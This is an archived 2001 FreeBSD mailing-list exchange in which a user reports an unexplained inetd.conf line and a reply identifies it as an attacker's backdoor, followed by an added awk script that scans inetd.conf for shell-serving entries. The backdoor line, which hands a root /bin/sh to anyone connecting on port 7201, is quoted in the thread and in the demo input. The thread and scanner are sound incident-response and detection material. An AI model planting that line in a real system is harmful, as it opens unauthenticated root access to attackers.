Date: Tue, 31 Jul 2001 17:52:53 -0400 (EDT)
From: Jeff Palmer <scorpio@drkshdw.org>
To: Hayden Katzenellenbogen <haydenk@nextlevelinternet.com>
Cc: <freebsd-stable@freebsd.org>
Subject: Re: Extra Line in my inetd.conf
Message-ID: <20010731174952.B5845-100000@jeff.isni.net>
In-Reply-To: <NFBBKLNOALGIGCIMHGKFGEPOCCAA.haydenk@nextlevelinternet.com>

You have been hacked. This line simply opens up a shell (/bin/sh) in
interactive mode (-i) on the port "dlip" as specified in your
/etc/services file (typically 7201).

I'd advise taking that machine OFF the network and performing an audit.
Refer to online documentation on how to diagnose, analyze, and cure the
exploit the attacker used to penetrate your system. Then apply that
knowledge to the newly FORMATted machine. (Yes, I recommend a full
format/reinstall of the OS.)

Jeff Palmer
scorpio@drkshdw.org

On Tue, 31 Jul 2001, Hayden Katzenellenbogen wrote:

> I have noticed this line at the bottom of some of my inetd.conf files on a
> few of my machines.. it is though not commented out I have commented it out
> as well I have no idea what it does...
>
> Anyone care to shed some light on this?
>
> #dlip   stream  tcp     nowait  root    /bin/sh sh -i
>
> Thanks
> Hayden
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-stable" in the body of the message
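
The reply above reads the entry field by field (service name, user root, server program /bin/sh, argument -i). As an added example that is not part of the original thread, this sh/awk function audits an inetd.conf for entries of that shape, active or commented out, and resolves the service name against a services file. The name scan_inetd, the list of shell names, and the sample files are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original thread. Flags inetd.conf entries whose
# server program is a shell. Output, tab-separated:
#   STATE  LINE  SERVICE  PORT  USER  PROGRAM
scan_inetd() {  # usage: scan_inetd CONF [SERVICES]
    awk -v svc="${2:-/etc/services}" '
    BEGIN {
        # Map "name/proto" to port number from the services file.
        while ((getline l < svc) > 0) {
            sub(/#.*/, "", l)
            if (split(l, s, /[ \t]+/) >= 2 && split(s[2], pp, "/") == 2)
                port[s[1] "/" pp[2]] = pp[1]
        }
    }
    {
        line = $0; state = "ACTIVE"
        sub(/^[ \t]+/, "", line)
        # A commented-out entry no longer listens, but is still evidence.
        if (sub(/^#+[ \t]*/, "", line)) state = "DISABLED"
        if (split(line, f, /[ \t]+/) < 6) next
        if (f[4] !~ /^(wait|nowait)/) next       # not an inetd entry
        base = f[6]; sub(/.*\//, "", base)
        if (base !~ /^(sh|csh|tcsh|bash|ksh|zsh)$/) next
        proto = f[3]; sub(/[0-9]+$/, "", proto)  # tcp4/tcp6 -> tcp
        key = f[1] "/" proto
        p = (key in port) ? port[key] : "unknown"
        printf "%s\t%d\t%s\t%s\t%s\t%s\n", state, NR, f[1], p, f[5], f[6]
    }' "$1"
}

# Constructed sample input (not taken from any real host).
demo_dir=$(mktemp -d)
cat > "$demo_dir/services" <<'EOF'
ftp     21/tcp
dlip    7201/tcp
dlip    7201/udp
EOF
cat > "$demo_dir/inetd.conf" <<'EOF'
# $FreeBSD$
ftp   stream tcp nowait root /usr/libexec/ftpd ftpd -l
#dlip stream tcp nowait root /bin/sh sh -i
dlip  stream tcp nowait root /bin/sh sh -i
EOF
scan_inetd "$demo_dir/inetd.conf" "$demo_dir/services"
```

Any ACTIVE finding means inetd will hand a shell to whoever connects to that port once it rereads its configuration; a DISABLED finding on a file nobody on the team edited is still a sign of tampering.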
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010731174952.B5845-100000>